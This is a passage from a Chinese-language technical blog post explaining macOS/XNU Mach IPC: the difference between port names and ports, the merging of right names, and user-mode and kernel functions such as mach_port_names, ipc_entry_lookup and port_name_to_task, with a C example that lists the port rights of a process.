<code>name</code>。</li></ol><p>虽然这两个类型在用户层中表示的值是相同的，但实际上在内核里有着非常明显的不同。</p><ul><li><p>对于<strong>端口名称</strong> (<strong>port name</strong>, aka <strong>mach_port_name_t</strong>) 来说，port name <strong>只是表示特定于某个 task 的 port</strong>，并且<strong>不携带任何关于该 port 的 right 相关信息</strong>。</p></li><li><p>而对于 <strong>端口</strong> (port, aka <strong>mach_port_t</strong>) 来说，它表示的是可以<strong>添加或删除某些端口权限</strong>的<strong>一个引用</strong>。当内核返回这样的一个引用给用户层时，用户层所获取到的是这个引用的 <strong>name</strong>，即 port name。这就是为什么用户层中，内核返回的 mach_port_name_t 和 mach_port_t 类型的变量都是同一个整型值。</p><blockquote><p><strong>正常来说</strong>，对于某个 mach port 来说，引用<strong>不同 right 的 name</strong> 是<strong>互不相同</strong>的。但也有例外，下文中有说明。</p></blockquote><p>但需要注意的是 ，mach_port_t 类型在内核中，确确实实映射了一个 ipc_port 类型的结构体，其中该结构体内含 port right 的相关数据。但 mach_port_name_t 只是 mach port 的一个整数表示形式，没有映射任何 ipc_port 类型的结构体，因此就没有关于该 mach port 的 right 信息。</p></li></ul><p>同时还有一点需要注意：对于某一个特定 mach port（即引用了相同的 ipc_port 结构体） ，如果该端口有多个 right，例如同时拥有 send right 和 receiver right。那么这些 right 的 name 将合并成一个 name，即一个 name 可以同时代表目标 mach port 的 send right 和 receiver right。但是，send once right 所对应的 name 总是唯一的命令，即总是会有一个独立的 name 来指代这个 mach port 的 send right。</p><p>当这两个类型被很好的区分开后，mach_port_t、mach_port_name_t、mach port right 以及 mach port 之间的关系就能很好的区分开了，对理解 mach IPC 有着非常多的帮助。这里先完整概括一下 port、right 以及 name 之间的关系：</p><ul><li><p>我们常常说的 <strong>mach port</strong>，指代的是<strong>内核</strong>中的 <strong>ipc_port 结构体</strong>，我们可以向这个 mach port 发送信息以及接收信息。</p></li><li><p>一个 mach port 在一些 task 中可能存在一些 rights，这些 rights 指定了当前 task 对该 mach port 的一些权限，例如接收信息，发送信息权限等等。这些在<strong>当前 task</strong> 中<strong>存在权限</strong>的 mach port ，一定在当前 task 的 ipc_space 中<strong>存在一个 ipc_port 结构体</strong>。</p><p>因此，<code>mach_port_t</code> 类型在<strong>内核</strong>（注意不是用户层）中就指代了一个在<strong>当前 task</strong> 中的 mach port 的<strong>一个 right</strong> 引用。</p><blockquote><p>注意 <code>mach_port_t</code> 类型在内核中<strong>不是</strong>直接代表一个 mach port，是不是觉得很绕？</p></blockquote></li><li><p>而 <code>mach_port_name_t</code> 类型在<strong>内核层和用户层</strong>中<strong>只是表示</strong>了一个 mach port，并<strong>没有涉及任何 right</strong>，也就更别说是 right 的引用了。</p></li><li><p>当内核返回给<strong>用户层</strong>一个 <code>mach_port_t</code> 类型引用时，与内核不同，这里<strong>用户层</strong>接收到的<strong>值的实质</strong>是<strong>对应该 right 的 name</strong>。即在用户层中， mach_port_t 类型的值表示的是对某个 mach port 对应的 <strong>right</strong> 的 <strong>name</strong>（注意此时<strong>并非直接引用</strong> right）。因此 <code>mach_port_t</code> 类型的值和 <code>mach_port_name_t</code> 类型的值会是相同的。</p></li><li><p>承接刚刚说的，正常来讲一个 mach_port_t 类型的值在<strong>用户层</strong>中会是某个 mach port 中<strong>一个 right</strong> 的 name。</p><p>但是，如果某个 mach_port_t 已经表示了<strong>某个 mach port 的 send right name</strong>，那么当用户请求一个表示了<strong>某个 mach port 的 receive right name（注意两个 right 是不同类型的）</strong>。那么这次请求将重用之前的 send right name，也就是说最后这个 port 既表示 send right name 又表示 receive right  name。</p><p>这种机制称为<strong>名称合并</strong>，即不同类型的 right 的 name 将可以合并为一个 name ，并指定多个 right。但需要注意的是 <strong>send-once right name无法被合并</strong>。</p><blockquote><p>例如两个 mach_port_t 类型分别表示引用某个 mach port 的 <strong>send right</strong> 和 <strong>send-once right</strong> 的 name，那么此时这两个 mach_port_t 类型的变量将是不同值。</p></blockquote></li></ul><h2 id="七、部分-IPC-基础-API">七、部分 IPC 基础 API</h2><h3 id="1-User-Mode">1. User Mode</h3><h4 id="a-mach-port-names">a. mach_port_names</h4><p>作用：返回指定 task 相关的 port namespace 信息。</p><p>函数定义如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span>   <span class="title">mach_port_names</span></span></span><br><span class="line"><span class="function">                <span class="params">(<span class="type">ipc_space_t</span>                               task,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_name_array_t</span>                  *names,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_number_t</span>               *namesCnt,</span></span></span><br><span class="line"><span class="params"><span class="function">                 mach_port_type_array_                   *types,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_number_t</span>               *typesCnt)</span></span>;</span><br></pre></td></tr></table></figure><p>其中，</p><ul><li><code>task</code>：待查阅的 task port，查阅者必须拥有目标 task 的 mach port  send right。</li><li><code>names</code>：存放查询结果的 <code>mach_port_name_t</code> 数组</li><li><code>namesCnt</code>：names 数组中的元素个数</li><li><code>types</code>：存放<strong>对于 names 数组中每个对应 name 的 right 类型</strong>的数组。</li><li><code>typesCnt</code>：types 数组中的元素个数。</li></ul><p>可以肯定的是，<strong>namesCnt 应该等于 typesCnt</strong>。</p><blockquote><p>而这个接口返回两个单独的 Cnt 是因为这是 Mach Interface Generator 的产物。‘</p></blockquote><p>需要注意的是，names 和 types 的缓冲区将会被自动创建，因此在使用完成后需要及时调用 vm_deallocate 释放。</p><h4 id="b-mach-port-get-attributes">b. mach_port_get_attributes</h4><p>作用：查询指定 port 的相关信息。</p><p>函数定义：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span>   <span class="title">mach_port_get_attributes</span></span></span><br><span class="line"><span class="function">                <span class="params">(<span class="type">ipc_space_t</span>                               task,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_name_t</span>                          name,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_flavor_t</span>                      flavor,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_info_t</span>                     port_info,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_number_t</span>        *port_info_count)</span></span>;</span><br></pre></td></tr></table></figure><p>其中，参数说明如下：</p><ul><li><p><code>task</code>：持有待查询 port 的 task</p></li><li><p><code>name</code>：待查询 port 的 name</p></li><li><p><code>flavor</code>：所查询的信息类型</p><p>查询的信息类型有两种，分别是：</p><ul><li><strong>MACH_PORT_LIMITS_INFO</strong>：返回端口的资源限制（<strong>mach_port_limits</strong>）</li><li><strong>MACH_PORT_RECEIVE_STATUS</strong>：随机返回与端口相关的 <strong>right 和 message</strong> 的信息（<strong>mach_port_status</strong>）</li></ul></li><li><p><code>port_info</code>：一个指向<strong>存放查询结果的缓冲区</strong>的指针</p></li><li><p><code>port_info_count</code>：缓冲区最大可存放结果的数量。函数返回时该值将会被修改为实际返回的查询结果个数。</p></li></ul><p>以下是组合使用上面两个函数的一个简单示例：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> EXIT_ON_MACH_ERROR(msg, retval) \</span></span><br><span class="line"><span class="meta">    <span class="keyword">if</span> (kr != KERN_SUCCESS)   &#123; mach_error(msg <span class="string">&quot;:&quot;</span>, kr); exit((retval)); &#125;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">print_mach_port_type</span><span class="params">(<span class="type">mach_port_type_t</span> type)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_SEND)         <span class="built_in">printf</span>(<span class="string">&quot;SEND &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_RECEIVE)      <span class="built_in">printf</span>(<span class="string">&quot;RECEIVE &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_SEND_ONCE)    <span class="built_in">printf</span>(<span class="string">&quot;SEND_ONCE &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_PORT_SET)     <span class="built_in">printf</span>(<span class="string">&quot;PORT_SET &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_DEAD_NAME)    <span class="built_in">printf</span>(<span class="string">&quot;DEAD_NAME &quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (type &amp; MACH_PORT_TYPE_DNREQUEST)    <span class="built_in">printf</span>(<span class="string">&quot;DNREQUEST &quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="type">pid_t</span> pid;</span><br><span class="line">    <span class="type">kern_return_t</span> kr;</span><br><span class="line">    <span class="type">mach_port_name_array_t</span> names;</span><br><span class="line">    <span class="type">mach_port_type_array_t</span> types;</span><br><span class="line">    <span class="type">mach_msg_type_number_t</span> ncount, tcount;</span><br><span class="line">    <span class="type">mach_port_limits_t</span> port_limits;</span><br><span class="line">    <span class="type">mach_port_status_t</span> port_status;</span><br><span class="line">    <span class="type">mach_msg_type_number_t</span> port_info_count;</span><br><span class="line">    <span class="type">task_t</span> task;</span><br><span class="line">    <span class="type">task_t</span> mytask = <span class="built_in">mach_task_self</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (argc != <span class="number">2</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(stderr, <span class="string">&quot;usage: %s &lt;pid&gt;\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    pid = <span class="built_in">atoi</span>(argv[<span class="number">1</span>]);</span><br><span class="line">    kr = <span class="built_in">task_for_pid</span>(mytask, (<span class="type">int</span>)pid, &amp;task);</span><br><span class="line">    <span class="built_in">EXIT_ON_MACH_ERROR</span>(<span class="string">&quot;task_for_pid&quot;</span>, kr);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// retrieve a list of the rights present in the given task&#x27;s IPC space,</span></span><br><span class="line">    <span class="comment">// along with type information (no particular ordering)</span></span><br><span class="line">    kr = <span class="built_in">mach_port_names</span>(task, &amp;names, &amp;ncount, &amp;types, &amp;tcount);</span><br><span class="line">    <span class="built_in">EXIT_ON_MACH_ERROR</span>(<span class="string">&quot;mach_port_names&quot;</span>, kr);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%8s %8s %8s %8s %8s task rights\n&quot;</span>,</span><br><span class="line">           <span class="string">&quot;name&quot;</span>, <span class="string">&quot;q-limit&quot;</span>, <span class="string">&quot;seqno&quot;</span>, <span class="string">&quot;msgcount&quot;</span>, <span class="string">&quot;sorights&quot;</span>);</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; ncount; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%08x &quot;</span>, names[i]);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// get resource limits for the port</span></span><br><span class="line">        port_info_count = MACH_PORT_LIMITS_INFO_COUNT;</span><br><span class="line">        kr = <span class="built_in">mach_port_get_attributes</span>(</span><br><span class="line">            task,                           <span class="comment">// the IPC space in question</span></span><br><span class="line">            names[i],                       <span class="comment">// task&#x27;s name for the port</span></span><br><span class="line">            MACH_PORT_LIMITS_INFO,          <span class="comment">// information flavor desired</span></span><br><span class="line">            (<span class="type">mach_port_info_t</span>)&amp;port_limits, <span class="comment">// outcoming information</span></span><br><span class="line">            &amp;port_info_count);              <span class="comment">// size returned</span></span><br><span class="line">        <span class="keyword">if</span> (kr == KERN_SUCCESS)</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8d &quot;</span>, port_limits.mpl_qlimit);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8s &quot;</span>, <span class="string">&quot;-&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// get miscellaneous information about associated rights and messages</span></span><br><span class="line">        port_info_count = MACH_PORT_RECEIVE_STATUS_COUNT;</span><br><span class="line">        kr = <span class="built_in">mach_port_get_attributes</span>(task, names[i], MACH_PORT_RECEIVE_STATUS,</span><br><span class="line">                                      (<span class="type">mach_port_info_t</span>)&amp;port_status,</span><br><span class="line">                                      &amp;port_info_count);</span><br><span class="line">        <span class="keyword">if</span> (kr == KERN_SUCCESS)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8d %8d %8d &quot;</span>,</span><br><span class="line">                   port_status.mps_seqno,     <span class="comment">// current sequence # for the port</span></span><br><span class="line">                   port_status.mps_msgcount,  <span class="comment">// # of messages currently queued</span></span><br><span class="line">                   port_status.mps_sorights); <span class="comment">// # of send-once rights</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8s %8s %8s &quot;</span>, <span class="string">&quot;-&quot;</span>, <span class="string">&quot;-&quot;</span>, <span class="string">&quot;-&quot;</span>);</span><br><span class="line">        <span class="built_in">print_mach_port_type</span>(types[i]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">vm_deallocate</span>(mytask, (<span class="type">vm_address_t</span>)names, ncount * <span class="built_in">sizeof</span>(<span class="type">mach_port_name_t</span>));</span><br><span class="line">    <span class="built_in">vm_deallocate</span>(mytask, (<span class="type">vm_address_t</span>)types, tcount * <span class="built_in">sizeof</span>(<span class="type">mach_port_type_t</span>));</span><br><span class="line"></span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>示例效果：</p><p><img src="/2021/12/mach_ipc_intro/image-20211231141800537.png" alt="image-20211231141800537"></p><h4 id="c-mach-port-request-notification">c. mach_port_request_notification</h4><p>当某个 mach port 被销毁后，其他 task 所持有的 right 都将转变为 dead name，因此当发送信息时，发送者可以得知目标 mach port 被销毁。</p><p>但如果发送者希望目标 mach port 在被销毁时能<strong>立即通知发送者</strong>，而不是等到发送者<strong>发送数据时才得知</strong>，那么这就是 <code>mach_port_request_notification</code> 函数的作用。该函数指定目标 mach port 的事件请求通知。以下是该函数的声明：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span>   <span class="title">mach_port_request_notification</span></span></span><br><span class="line"><span class="function">                <span class="params">(<span class="type">ipc_space_t</span>                               task,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_name_t</span>                          name,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_id_t</span>                          variant,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_mscount_t</span>                       sync,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_send_once_t</span>                   notify,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_name_t</span>               notify_type,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_send_once_t</span>                *previous)</span></span>;</span><br></pre></td></tr></table></figure><p>具体参数暂不说明，等实际应用到了再来补充。</p><h3 id="2-Kernel-Mode">2. Kernel Mode</h3><h4 id="a-ipc-entry-lookup">a. ipc_entry_lookup</h4><blockquote><p>注：ipc_right_lookup_write 是该函数的 Wrapper；而 ipc_right_lookup_read 又是 ipc_right_lookup_write 的宏。</p></blockquote><p>功能：在<strong>当前 task</strong> 的 <strong>IPC space</strong> 结构体中，根据传入的<strong>用户层 mach port name</strong>，获取到<strong>内核</strong>中对应的 <strong>ipc_entry_t 结构</strong>。</p><p>先上代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ipc_entry_t</span></span></span><br><span class="line"><span class="function"><span class="title">ipc_entry_lookup</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">ipc_space_t</span>        space,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_name_t</span>    name)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">mach_port_index_t</span> index;</span><br><span class="line">    <span class="type">ipc_entry_t</span> entry;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">is_active</span>(space));</span><br><span class="line">    <span class="comment">// 获取 name 所对应的 index</span></span><br><span class="line">    index = <span class="built_in">MACH_PORT_INDEX</span>(name);</span><br><span class="line">    <span class="keyword">if</span> (index &lt;  space-&gt;is_table_size) &#123;</span><br><span class="line">                entry = &amp;space-&gt;is_table[index];</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">IE_BITS_GEN</span>(entry-&gt;ie_bits) != <span class="built_in">MACH_PORT_GEN</span>(name) ||</span><br><span class="line">            <span class="built_in">IE_BITS_TYPE</span>(entry-&gt;ie_bits) == MACH_PORT_TYPE_NONE) &#123;</span><br><span class="line">            entry = IE_NULL;        </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        entry = IE_NULL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>((entry == IE_NULL) || <span class="built_in">IE_BITS_TYPE</span>(entry-&gt;ie_bits));</span><br><span class="line">    <span class="keyword">return</span> entry;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在 ipc_entry_lookup 函数中，我们可以看到，mach_port_name_t (aka unsigned int) 被分为了2个部分，分别是 MACH_PORT_INDEX 与 MACH_PORT_GEN。组装方式如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_PORT_INDEX(name)       ((name) &gt;&gt; 8)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_PORT_GEN(name)         (((name) &amp; 0xff) &lt;&lt; 24)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_PORT_MAKE(index, gen)  \</span></span><br><span class="line"><span class="meta">        (((index) <span class="string">&lt;&lt; 8) | (gen) &gt;</span>&gt; 24)</span></span><br></pre></td></tr></table></figure><p>其中，</p><ul><li>MACH_PORT_INDEX 用于在 <code>task-&gt;ipc_space-&gt;is_table</code> 中充当索引作用，有点类似于文件描述符。</li><li>MACH_PORT_GEN 说明当前 mach port 是第几代（generation）的。个人猜测这是为了将 mach port 与过去那些相同 index 但不同（且已经被释放）的 mach port 所区分开，防止混淆。</li></ul><p>还有个需要注意的地方是，在 mach_port_name_t 中，其32位数据的用途划分如下：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">+--------------------+-----+</span><br><span class="line">|   is_table index   | gen |</span><br><span class="line">+--------------------+-----+</span><br><span class="line">32                   8     0</span><br></pre></td></tr></table></figure><p>但在 ipc_entry 结构体中的 ie_bits 字段，其32位数据用途如下所示：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">+-----+-----+------+----------------+</span><br><span class="line">| gen |     | type | user-reference |</span><br><span class="line">+-----+-----+------+----------------+</span><br><span class="line">32    24    21     16               0</span><br></pre></td></tr></table></figure><h4 id="b-ipc-right-copyin">b. ipc_right_copyin</h4><blockquote><p>先简单了解一下函数命名规则：</p><ul><li>xxx_copyin：发送方调用</li><li>xxx_copyout：接收方调用</li></ul></blockquote><p>ipc_right_copyin 会根据传入的 <strong>msgt_name</strong> (mach_msg_type_name_t) ，对<strong>目标 ipc_entry_t</strong> 中的 <strong>ipc_port 结构体</strong>上的某些字段进行修改操作，并<strong>返回对应的 ipc_port 结构体指针给上层调用者</strong>。</p><p>回顾一下上面 ipc_port 结构体的字段，该函数<strong>主要</strong>会对这三个字段进行增加操作：</p><blockquote><p>还有些其他的我没贴上来。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">mach_port_mscount_t</span> ip_mscount; <span class="comment">// make send 的次数</span></span><br><span class="line"><span class="type">mach_port_rights_t</span> ip_srights;  <span class="comment">// send right 当前存在的发送权限的数量</span></span><br><span class="line"><span class="type">mach_port_rights_t</span> ip_sorights; <span class="comment">// send once right 数量</span></span><br></pre></td></tr></table></figure><p>该函数涉及到 mach port 的权限操作。port right 类型主要有以下几种：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MOVE_RECEIVE      16    <span class="comment">/* Must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MOVE_SEND         17    <span class="comment">/* Must hold send right(s) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MOVE_SEND_ONCE    18    <span class="comment">/* Must hold sendonce right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_COPY_SEND         19    <span class="comment">/* Must hold send right(s) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MAKE_SEND         20    <span class="comment">/* Must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MAKE_SEND_ONCE    21    <span class="comment">/* Must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_COPY_RECEIVE      22    <span class="comment">/* NOT VALID */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_DISPOSE_RECEIVE   24    <span class="comment">/* must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_DISPOSE_SEND      25    <span class="comment">/* must hold send right(s) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26    <span class="comment">/* must hold sendonce right */</span></span></span><br></pre></td></tr></table></figure><p>这个函数我们暂时不用深入了解，只需知道该函数除了做一些 right 处理以外，还会将 ipc_entry 中的 ipc_port 结构体返回给调用者即可。</p><h4 id="c-port-name-to-task">c. port_name_to_task</h4><p>功能：在<strong>内核空间</strong>中，根据用户传入的 <strong>task port name</strong> （一串数字表示的值），获取所实际引用的 task 结构体指针。</p><p>代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">task_t</span></span></span><br><span class="line"><span class="function"><span class="title">port_name_to_task</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_name_t</span> name)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">ipc_port_t</span> kern_port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr;</span><br><span class="line">    <span class="type">task_t</span> task = TASK_NULL;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">MACH_PORT_VALID</span>(name)) &#123;</span><br><span class="line">        kr = <span class="built_in">ipc_object_copyin</span>(<span class="built_in">current_space</span>(), name,</span><br><span class="line">                       MACH_MSG_TYPE_COPY_SEND,</span><br><span class="line">                       (<span class="type">ipc_object_t</span> *) &amp;kern_port);</span><br><span class="line">        <span class="keyword">if</span> (kr != KERN_SUCCESS)</span><br><span class="line">            <span class="keyword">return</span> TASK_NULL;</span><br><span class="line"></span><br><span class="line">        task = <span class="built_in">convert_port_to_task</span>(kern_port);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">IP_VALID</span>(kern_port))</span><br><span class="line">            <span class="built_in">ipc_port_release_send</span>(kern_port);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> task;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>该函数内部会将 task port name 传入 ipc_object_copyin 函数中，获取其对应的 task port 的 ipc_port 结构体。之后，在  convert_port_to_task 中，将 task port 对应的 ipc_port 结构体中的 ip_kobject 字段的值取出，并作为 目标 task 结构体指针。</p><h4 id="d-mach-msg-2">d. mach_msg</h4><p>mach_msg 是用户用于发送和接受 mach message 的 API。</p><p>上个完整的流程图：</p><p><img src="/2021/12/mach_ipc_intro/image-20211231144049005.png" alt="image-20211231144049005"></p><p>mach_msg_overwrite_trap 是 mach msg 发送与接收消息的实际内核处理函数。该函数的实现分为两部分，分别是发送消息和接收消息：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 